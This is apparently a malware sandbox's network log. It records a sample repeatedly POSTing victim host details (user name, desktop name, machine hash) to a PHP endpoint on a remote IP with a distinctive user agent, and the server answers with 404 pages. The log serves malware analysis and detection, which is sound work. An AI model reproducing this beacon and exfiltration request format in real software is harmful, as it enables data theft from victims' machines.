                    Jun 22, 2021 18:23:11.658580065 CEST1238INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                    Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                    Jun 22, 2021 18:23:11.658617973 CEST1239INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                    Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                    Jun 22, 2021 18:23:11.658648968 CEST1241INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                    Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                    Jun 22, 2021 18:23:11.658677101 CEST1242INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                    Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.44973763.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:12.059133053 CEST1348OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 190
                    Connection: close
                    Jun 22, 2021 18:23:12.219800949 CEST1350OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: 'ckav.rujones610930DESKTOP-716T771+08F9C4E9C79A3B52B3F739430HqjDD
                    Jun 22, 2021 18:23:12.893781900 CEST1359INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:12 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                    Jun 22, 2021 18:23:12.893882036 CEST1361INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                    Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                    Jun 22, 2021 18:23:12.893944025 CEST1362INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                    Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                    Jun 22, 2021 18:23:12.894001961 CEST1363INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                    Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                    Jun 22, 2021 18:23:12.894057989 CEST1365INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                    Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                    Jun 22, 2021 18:23:12.894121885 CEST1366INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                    Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                    Jun 22, 2021 18:23:12.894182920 CEST1367INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                    Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                    Jun 22, 2021 18:23:12.894217968 CEST1369INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                    Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.44973963.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:13.182091951 CEST1374OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 163
                    Connection: close
                    Jun 22, 2021 18:23:13.342540026 CEST1375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jun 22, 2021 18:23:14.000350952 CEST1388INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:13 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                    Jun 22, 2021 18:23:14.000412941 CEST1389INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                    Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                    Jun 22, 2021 18:23:14.000477076 CEST1391INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                    Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                    Jun 22, 2021 18:23:14.000520945 CEST1392INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                    Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                    Jun 22, 2021 18:23:14.000557899 CEST1393INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                    Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                    Jun 22, 2021 18:23:14.000595093 CEST1395INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                    Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                    Jun 22, 2021 18:23:14.000632048 CEST1396INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                    Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                    Jun 22, 2021 18:23:14.000668049 CEST1397INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                    Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.44974163.141.228.14180C:\Users\user\Desktop\2CW1YLhNIS.exe
                    TimestampkBytes transferredDirectionData
                    Jun 22, 2021 18:23:14.320616007 CEST1400OUTPOST /32.php/QQojJUjm8ByeT HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: 63.141.228.141
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: C18574AA
                    Content-Length: 163
                    Connection: close
                    Jun 22, 2021 18:23:14.480549097 CEST1401OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jun 22, 2021 18:23:15.133425951 CEST1414INHTTP/1.1 404 Not Found
                    Date: Tue, 22 Jun 2021 16:23:14 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
